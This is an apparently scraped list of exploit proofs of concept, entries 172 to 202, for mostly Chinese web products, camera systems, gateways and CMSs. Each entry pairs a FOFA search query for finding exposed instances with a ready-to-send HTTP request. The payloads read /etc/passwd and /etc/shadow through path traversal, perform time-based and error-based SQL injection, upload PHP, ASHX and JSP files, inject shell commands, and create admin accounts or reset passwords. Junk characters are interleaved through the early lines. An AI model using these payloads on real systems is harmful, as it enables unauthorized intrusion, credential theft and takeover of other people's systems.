172. DT-高清车牌识别摄像机任意文件读取, H6 X; x. M9 `( F* I) y
FOFA:app="DT-高清车牌识别摄像机"; K8 U9 ^0 p* D# e
GET /../../../../etc/passwd HTTP/1.1
+ h7 W( b# o: b" S' A4 uHost: your-ip
2 y' s! h9 ?$ O3 T: V" y! aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 Y8 F4 a/ S# X5 v3 DAccept-Encoding: gzip, deflate4 s8 t2 r8 h/ L% W2 y& F
Accept: */*
; ^) Z! x+ ?& A1 ^1 pConnection: keep-alive5 O7 L* F& u6 r, X* y# n" K
8 i3 {, a5 b7 l; D: A; `

4 q$ K5 n( t8 |% X- W7 g3 P  ]* G0 h
1 _- \( f2 H- r. V7 P! U173. Check Point 安全网关任意文件读取
3 E9 z6 O: N& k, y4 A; l7 bCVE-2024-24919
: h5 u8 k( H+ EFOFA:app="Check_Point-SSL-Network-Extender"
! x! K% G6 I% n" a3 l/ T3 NPOST /clients/MyCRL HTTP/1.1
3 Y  d, c' m; M0 N+ M) }Host: your-ip
& E7 c" s5 E- L1 ?3 b- SContent-Type: application/x-www-form-urlencoded: r5 I* v8 G& j! n$ |1 _
) n& i1 i" M  _  U+ o; s1 h5 w
aCSHELL/../../../../../../../etc/shadow
3 O% X2 y# g5 K9 `) ?& ~! H" @
* \4 x9 T  Z0 h2 r% t2 B% I- p; n; n$ x

$ Q' F9 x$ q+ k$ }5 V8 {0 d$ ~174. 金和OA C6 FileDownLoad.aspx 任意文件读取$ t* J3 Y: W% A5 b3 n  z8 o  G
FOFA:app="金和网络-金和OA"
/ D8 t& X( g5 `GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1* o2 f, w' {  E! S" y# b
Host: your-ip
% r, d* J/ J; a" tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; p. e! M4 C$ K1 X) G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 b7 ^5 J; H! p8 w: O: N7 \3 H! UAccept-Encoding: gzip, deflate, br
* P0 n2 }: |( l& z5 |2 VAccept-Language: zh-CN,zh;q=0.94 V8 v+ s. k+ e" T( `% m9 J1 V
Connection: close
" T6 l0 K4 q8 s8 w1 z6 @- Q
9 r# k8 E4 Z1 u$ e4 h  ^
2 ~" J8 c0 U4 \
) O7 p; G6 B. g175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入: |! v/ X  Y' M  k% \
FOFA:app="金和网络-金和OA"! k$ }! L! o3 k+ s) q# M7 v
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
1 n6 n1 _' s6 O8 jHost:
" _2 T. p7 B/ b0 f1 {% p( K' SUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% n) g2 @, W* T4 `2 _7 |& \" YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* @7 P* [/ F7 y8 ~, U* B) GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! E1 i4 ~$ i/ p- h+ k
Accept-Encoding: gzip, deflate& u) W  l' W  l" U" d) U, b
Connection: close. g2 G; n: o$ f0 ~6 i+ z
Upgrade-Insecure-Requests: 1
$ h6 v; Z' k: B" U" J5 A( _- V) `7 N0 o" ?
" w; e8 e$ J8 }9 F5 _; ^
176. 电信网关配置管理系统 rewrite.php 文件上传
9 D4 m  r+ }* d) GFOFA:body="img/login_bg3.png" && body="系统登录"
& Q7 g# O3 A3 t! fPOST /manager/teletext/material/rewrite.php HTTP/1.1
1 r" g1 R1 g! |Host: your-ip
+ c2 F3 }' q8 G" R8 r  bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0+ f5 I3 j2 x) @; {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT9 S0 [2 d3 y' V9 Z7 q$ n
Connection: close
% }! @% g: \. d8 Y; Y6 H
& G( @) G% O3 N# F9 ~" C$ h! O------WebKitFormBoundaryOKldnDPT
! x* k: m9 o$ k& Z3 lContent-Disposition: form-data; name="tmp_name"; filename="test.php"0 k( J" Y5 y9 o% X: B9 k
Content-Type: image/png
$ d5 X3 {3 A2 x! ^
3 W# X  b5 n; A5 Q- ?5 x% F<?php system("cat /etc/passwd");unlink(__FILE__);?>
' }8 A4 W7 |; N( W, S9 j------WebKitFormBoundaryOKldnDPT' \. Y2 e& I* {
Content-Disposition: form-data; name="uploadtime"
1 \' R* x( Q. \1 _ 5 V3 R7 @: o: `  z- Z" G/ X  c- M0 ^9 G

$ j2 Z. L6 D/ Y  B------WebKitFormBoundaryOKldnDPT--4 I; M4 A" }& b7 `& a; `6 B( c

1 U* V! k: O' O6 \( F3 Z, D0 t9 g1 J/ ]
; [2 a: K6 V9 r$ C* o
177. H3C路由器敏感信息泄露
7 J8 [* ^8 ]7 [' f. I: Y) a3 D  Z/ a5 \/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
# u5 v& K. w4 Z3 [! k/userLogin.asp/../actionpolicy_status/../M60.cfg
4 n, s+ M. v2 B: S/userLogin.asp/../actionpolicy_status/../GR8300.cfg
# W* n3 ?; j; A3 L; W; T$ t% E/userLogin.asp/../actionpolicy_status/../GR5200.cfg( u/ @& R) [4 }! P0 i9 e7 C# i
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
$ F; E# ^' z7 s% H; _9 Q* O" d* E/userLogin.asp/../actionpolicy_status/../GR2200.cfg$ _7 v$ p5 U- S* e  }
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg- d% O, O8 x4 \& {( d
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg( a2 Q- {5 F2 ^5 {
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
7 Q; L" o) _4 h1 H+ a/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
, J% T$ {& z: y, W( V8 E/userLogin.asp/../actionpolicy_status/../ER5200.cfg
1 J& h5 I1 B3 U" b) c  i/userLogin.asp/../actionpolicy_status/../ER5100.cfg. l! Q4 T- l' n2 I/ e; b1 n" a
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg4 ?# @. ~/ `) F$ n2 M& U
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
$ n' E7 u, U/ O4 |/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
$ z" x! q3 J4 g7 |/ m/userLogin.asp/../actionpolicy_status/../ER3200.cfg
( d1 F% h* e2 Y1 F4 T/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg+ C& v' v$ s6 Z6 t' T) h9 A
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg3 }- Y# e1 z9 O+ M8 Y! \$ ]0 C
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg, P. G2 C7 H! x& \3 f$ t
/userLogin.asp/../actionpolicy_status/../ER3100.cfg$ y7 C8 ~! E! R
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg5 Q0 y' v# h6 Z% o
! o+ Z/ E1 D3 V9 n$ Q2 z, z
- E# D* s( Z: F  _  c
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
8 t; d% X- g2 ~" D! D! hFOFA:header="/selfservice"# ^. c6 ^$ t' g3 w6 j
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1* F2 m9 w6 a0 O# {0 _# i  I
Host:; j2 S& A8 k4 K. u+ y4 G- S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 q, y# Q+ H, b$ I6 f# S; `4 {# q4 X
Content-Length: 252( _2 m% y6 @: s6 d5 v2 V
Accept-Encoding: gzip, deflate  c. N0 i1 x, [+ t5 B+ a/ Y
Connection: close
: j1 X, o! \7 I# `3 |7 uContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
' v& P) T& v, `! d) ~. Y6 O-----------------aqutkea7vvanpqy3rh2l
3 E( @: O% \/ E! i! K6 \9 O" hContent-Disposition: form-data; name="12234.txt"; filename="12234"
4 Q7 \( ?/ z1 `' j% }Content-Type: application/octet-stream, j4 J. ?. j" M: f( y8 ^' ?
Content-Length: 255
! X. X' O* c- |( X7 u! w8 m$ Y: g8 ~6 e
12234" v- {- u! ^" h: r% V1 M
-----------------aqutkea7vvanpqy3rh2l--" [0 z7 `: U  A! n, e! a; M& N
: R" }( }1 B8 B# U" _+ ?
6 _5 h$ s* T" b, A0 ~. L2 V
GET /imc/primepush/%2e%2e/flex/12234.txt
5 w$ t; S3 s; I) k, j4 d7 i1 B% n" K3 U; K
1 J% \, j  z( T6 T/ M
179. 建文工程管理系统存在任意文件读取) N1 k/ s; j7 h! ^& L
POST /Common/DownLoad2.aspx HTTP/1.1# v6 O7 B; C* R& u& y
Host: {{Hostname}}7 v6 t! _2 D6 R  q, B# z  _9 T# d. x2 Y7 @
Content-Type: application/x-www-form-urlencoded
0 i+ N8 G$ K2 m1 J7 QUser-Agent: Mozilla/5.0
/ N, X9 u( d4 G$ o4 v2 ~
5 d! r+ v1 P1 w- Opath=../log4net.config&Name=
( m' o' Y' M. o2 X, v  _  ?6 G! V# n1 e8 ^* f. G4 y$ L

/ j/ t$ N* s3 A  X180. 帮管客 CRM jiliyu SQL注入
9 U3 w1 S5 n1 ~) B( X6 ~# _FOFA:app="帮管客-CRM"& N. a' t; X7 H% T! R( z  j, F" U: _
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
' x' l4 {4 {0 g! q' {Host: your-ip
; ]5 }6 v4 H/ j8 |4 D) iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" y/ A3 C0 P$ x( EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: r: G, Y0 B, q& r- T/ m9 Y6 q5 v: X
Accept-Encoding: gzip, deflate
) [% g1 |5 U. M* [. qAccept-Language: zh-CN,zh;q=0.98 F0 P' Q8 z/ q9 }
Connection: close# M9 T. ~1 g6 S  M4 V
' z. \2 d$ F* N& e0 C* }9 Q, x
) e" ?3 W! C% K
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
6 ^( A4 x# t6 L) Q/ mFOFA:"PDCA/js/_publicCom.js"  O. X- G5 Q; \
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
1 Y# O" X; b( S4 {1 pHost: your-ip
( H9 k- ]/ C2 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36' w3 h# ~/ o/ {6 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ J# Q: C; p& s7 _/ a9 lAccept-Encoding: gzip, deflate, br
7 ~+ y7 W% N$ JAccept-Language: zh-CN,zh;q=0.9/ u" ~5 U; V6 F% r) N  y
Connection: close+ e! f) ?6 f* @3 a
Content-Type: application/x-www-form-urlencoded
+ ^2 Q2 L$ J8 K" U# A; ^: M! U% x% e  s) G+ f
' @* ^% T/ o, v- S% v
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
$ c+ c7 c- k. {5 l! y
. V, L0 s6 b' O% X2 v8 S9 |) V1 R3 X# H' o0 p5 z. u8 A% e7 q
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建$ l* C" i$ C" }+ \9 }2 V
FOFA:"PDCA/js/_publicCom.js"
& V2 @* _& C! b! O; l! fPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1; I  J1 `  K4 P2 L
Host: your-ip  Y0 @5 a9 H- \3 ~% f, W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
3 w3 m' {. h. M" GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 K& K5 u  A1 p' L& sAccept-Encoding: gzip, deflate, br
2 N: g7 u$ c6 Y0 ^, NAccept-Language: zh-CN,zh;q=0.93 L3 F- [9 s$ @7 \: ?/ ]( K
Connection: close! y1 ?3 G3 w- L4 h' P
Content-Type: application/x-www-form-urlencoded
' C& p( Q4 e9 N8 g( e  Y; O8 H) Y; e7 t1 d$ Y9 {6 y" Y

0 s3 D6 R1 ~) j1 Z1 I5 _username=test1234&pwd=test1234&savedays=1
8 F( L% Y: W/ t0 r  ]/ B
& y3 d( Y6 q! V# O. j& P+ i! O$ U7 V+ V
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入+ d" z: {, a: M9 B. j7 T7 \
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
& n9 b2 M! O% f- Z& mGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.14 z/ \" t0 ~! b) J. N8 R$ @
Host: your-ip
/ k! C5 q1 S9 k4 I; L. jUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.365 g; ^2 u/ ]' @) P! D) x
Accept-Charset: utf-8( v6 c, x% g3 s2 e1 K1 A
Accept-Encoding: gzip, deflate
9 I$ A8 Y9 s3 m5 R: a: w: ~Connection: close* Y0 f4 {) h6 K1 y5 j7 [: K. q) w6 _

$ [$ ?3 d+ X- ?# L+ |& J9 Z
) a, Y4 ?" m0 a, p184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加1 a- q: N3 n0 K
FOFA:server="SunFull-Webs"
  F. G: m/ x& @* X: g" U+ pPOST /soap/AddUser HTTP/1.1; T3 m; e& S( A7 M5 G
Host: your-ip
4 N6 j4 F2 _* ^" iAccept-Encoding: gzip, deflate5 [$ M" v+ G& j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
: ]: X; l$ _- J: m! KAccept: application/xml, text/xml, */*; q=0.01- N) V% u' C3 A, |, ?
Content-Type: text/xml; charset=utf-8# ~2 b! P# N- |3 G, S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( a( e0 w1 O( q8 r8 d- m+ S  r
X-Requested-With: XMLHttpRequest
8 s3 ]2 _- P8 S* }
1 r* z2 @, G* c, {5 u, T* o8 ?; d, E  t& B+ x
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')# N2 b, [$ {1 I/ }4 L3 T7 g- j- z+ {

. L$ m; K0 c1 H- r% K! h, U0 w. U( c
185. 瑞友天翼应用虚拟化系统SQL注入
8 M* Z5 G' w) ~: M; vversion < 7.0.5.1+ z+ K5 P. k- Q1 ]/ L
FOFA:app="REALOR-天翼应用虚拟化系统"
4 I( s9 y7 [- v3 k, A- W" A) @8 _, tGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
: M3 A2 v% L$ ]  tHost: host
! h% b; M: O' t: u8 O* y) v- o# e7 W# Y! a! s

3 H) y. K7 U3 g3 \* y' Q6 a$ U186. F-logic DataCube3 SQL注入4 \5 S3 N) L+ _4 ]# s7 ]
CVE-2024-31750
# u) X0 r3 b8 g# Y# K2 J: rF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统( W# @  G7 z5 G
FOFA:title=="DataCube3"2 m( G/ I" G' L( h9 A
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
- a1 m( Y: z: S# l$ XHost: your-ip9 l: v5 U7 p/ _. \* i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0( ^3 O. o0 @+ u( s: N% d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
9 N3 v- ^! i% w& KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, F6 E' e; }0 s" u" f9 {
Accept-Encoding: gzip, deflate( k; N) {$ b) a2 d
Connection: close
( t1 W) a. x2 Y( m* w; lContent-Type: application/x-www-form-urlencoded- [9 L7 k$ u. E. g3 \- H1 l* Q
- C( L# i. ^. w
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450+ ]1 c. {1 X+ e4 k7 Z& l
& S; ]$ ^% \0 F2 j' B

/ Y9 a& q' z& d6 u9 ^! K187. Mura CMS processAsyncObject SQL注入
! r- W- u) t8 n+ Y+ x! [CVE-2024-32640: x+ s7 n% |4 u9 }6 x9 s, [
FOFA:"Mura CMS"
# S7 x8 T2 @$ Q# {% `, `POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
' C( a0 H( c( Y3 J" qHost: your-ip
: c6 ?! E/ q& Y' S; J, iContent-Type: application/x-www-form-urlencoded9 N; D. T( A% B$ U: L1 y$ h
( @+ T! Q. W. N! F# w

4 Y* ^0 u6 [' X5 r2 z) wobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
6 b9 d7 z8 d9 J+ _$ f4 y4 C
) O+ I$ c6 n! E1 z. b! ~: T4 Q
. v+ H" j: x* E188. 叁体-佳会视频会议 attachment 任意文件读取
6 L0 Z* n5 d5 ~, \* [3 ^7 u2 lversion <= 3.9.7. m) k, N$ G" ^' e5 G4 k+ z
FOFA:body="/system/get_rtc_user_defined_info?site_id"
( A5 }( E1 c( }) l* U3 ~GET /attachment?file=/etc/passwd HTTP/1.14 T% f9 J0 ^8 o0 b4 W" D
Host: your-ip, {2 m; P* }1 _" M; {; j" o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% s7 R! D2 S9 s% ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: N" L$ f0 n3 p$ |# e7 M
Accept-Encoding: gzip, deflate
9 s6 F9 H- ^& E. H. u/ R4 @Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  L* }4 W2 N  w$ a, i8 ?2 A! a
Connection: close
2 S% Z% c* V. M1 r/ W3 x4 l, k! S0 p. @; z8 j+ w
- d% ]# i% m, _( o& Q
189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability exists.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager_upload endpoint file upload

1. Run the POC to obtain the CSRF value, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--


/storage/uploads/tttt.php

200. SeaCMS海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

